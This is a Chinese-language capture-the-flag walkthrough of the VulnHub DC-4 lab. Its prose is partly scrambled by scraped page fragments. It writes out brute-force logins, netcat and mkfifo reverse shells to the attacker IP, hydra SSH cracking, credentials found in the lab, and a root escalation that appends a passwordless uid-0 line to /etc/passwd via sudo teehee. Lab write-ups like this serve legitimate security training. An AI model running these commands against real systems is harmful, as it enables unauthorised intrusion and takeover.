物流系统网站建设 的网站描述,网线制作图解,成都的网站建设,图库网站cms文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-4下载地址#xff1a;https://download.vulnhub.com/dc/DC-4.zip kali#xff1a;192.168.144.148 DC-4#xff1a;192.168.144.152 二、渗透流程 端口扫描#xff1a;nmap -T5 -p- -sV -sT -A 192.168.144.1…
文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-4下载地址https://download.vulnhub.com/dc/DC-4.zip kali192.168.144.148 DC-4192.168.144.152 二、渗透流程 端口扫描nmap -T5 -p- -sV -sT -A 192.168.144.152 思路
1、访问80页面爆破账号密码可利用
2、对http://192.168.144.152进行目录爆破
3、查看网页源代码
4、查看web指纹信息
……使用burpsuite对登录页面进行爆破adminhappy 思路登录后有run command按钮抓包发现可以执行命令
1、请求包中执行反弹shell命令可利用
2、使用wget让靶机下载webshell然后连接webshell
……方法1 使用netcat反弹shellnc -e /bin/sh 192.168.144.148 4444 kali监听nc -lvnp 4444 python -c import pty;pty.spawn(/bin/sh) 方法2 kali端监听 nc -lnvp 4444 修改网页源代码为反弹shell代码rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 21 | nc 192.168.144.148 4444 /tmp/f;然后点击run kali端获取到反弹shell 思路此时已经拿到shell
1、查看当前权限
2、翻翻找找看看有没有可利用的
……python -c import pty;pty.spawn(/bin/bash) cat /etc/passwd 发现三个用户charles、jim、sam cd /home 发现三个用户目录 /jim路径下发现old-passwords.bak文件进行利用 利用old-passwords.bak保存的密码对jim的密码进行爆破 爆破密码hydra -l jim -P passwd.txt -s 22 ssh://192.168.144.152 成功获取密码jimjibril04 ssh登录ssh jim192.168.144.152 -p 22 cd /var/mail 下发现charles的密码^xHhAhvim0y jim下没其他可以利用的了我们尝试登录charles用户 ssh charles192.168.144.152 -p 22 查看是否有sudo权限sudo -l 发现teehee执行权限 teehee --help 发现-a参数可以写入文件 用户名密码用户ID组ID用户说明家目录登陆之后的 shell echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd su test 三、思路总结
1、爆破登录账号密码
2、根据页面功能反弹shell
3、查看获取到的shell的可利用文件
4、ssh连接
5、利用teehee执行权限添加特权用户获取root权限参考链接 https://blog.mzfr.me/vulnhub-writeups/2019-07-11-DC4